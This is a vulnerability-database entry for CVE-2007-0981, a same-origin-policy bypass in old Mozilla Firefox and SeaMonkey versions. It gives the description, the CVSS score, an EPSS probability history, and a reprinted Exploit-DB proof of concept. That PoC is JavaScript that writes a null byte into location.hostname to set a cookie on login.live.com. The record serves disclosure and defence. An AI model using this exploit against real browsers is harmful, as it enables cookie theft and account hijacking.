CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Mozilla based browsers, including Firefox before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8, allow remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code.
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
15.27%
–
–
2022-03-13
–
–
15.27%
–
–
2022-04-03
–
–
15.27%
–
–
2023-03-12
–
–
–
97.35%
–
2023-04-02
–
–
–
97.31%
–
2023-06-18
–
–
–
97.29%
–
2023-07-23
–
–
–
97.25%
–
2023-09-03
–
–
–
97.21%
–
2023-10-08
–
–
–
97.23%
–
2023-11-12
–
–
–
97.22%
–
2023-12-24
–
–
–
96.43%
–
2024-01-28
–
–
–
96.74%
–
2024-03-10
–
–
–
96.79%
–
2024-04-14
–
–
–
96.7%
–
2024-06-02
–
–
–
96.89%
–
2024-07-14
–
–
–
96.96%
–
2024-09-01
–
–
–
97%
–
2024-12-22
–
–
–
96.44%
–
2025-01-12
–
–
–
96.94%
–
2025-01-19
–
–
–
96.94%
–
2025-03-18
–
–
–
–
35.02%
2025-03-18
–
–
–
–
35.02,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2007-02-19 23h00 +00:00 Author : Michal Zalewski EDB Verified : Yes
<!--
________________________________________________________________________________
Mozilla Firefox 'location.hostname' Cross-Domain Vulnerability
________________________________________________________________________________
Software : Mozilla Firefox version 2.0.0.1 and prior
CVE reference : CVE-2007-0981
Impact : Security Bypass
Risk : Moderate
Discovered by : Michal Zalewski (http://lcamtuf.coredump.cx/)
Advisory Date : 2007-02-15
Mozilla Firefox allows remote attackers to bypass the same origin policy, steal
cookies, and conduct other attacks by writing a URI with a null byte to the
hostname (location.hostname) DOM property, due to interactions with DNS
resolver code.
Links
http://lcamtuf.dione.cc/ffhostname.html (test)
https://bugzilla.mozilla.org/show_bug.cgi?id=370445
________________________________________________________________________________
How To Test Your Browser ?
1 - Execute this on your local web server (or change variable 'mydomain')
2 - Go to the link 'http://login.live.com/' and read the login
(or check Tools -> Options -> Privacy -> Show Cookies for login.live.com)
________________________________________________________________________________
Gorn, gorn.support[gmail]com
2007-02-19 16:00
-->
<script language="javascript">
var mydomain = '127.0.0.1';
var var_cook = 'MSPPre=firefox_vulnerability_test';
var dom_cook = 'login.live.com';
if (location.hostname == mydomain)
{
try { location.hostname = mydomain + '\x00www.' + dom_cook; }
catch (err) { alert('Failed to modify location.hostname'); }
} else {
document.cookie = var_cook + '; domain=.' + dom_cook + '; path=/;';
}
</script>
# milw0rm.com [2007-02-20]
Products Mentioned
Configuraton 0
Mozilla>>Firefox >> Version To (including) 1.5.0.9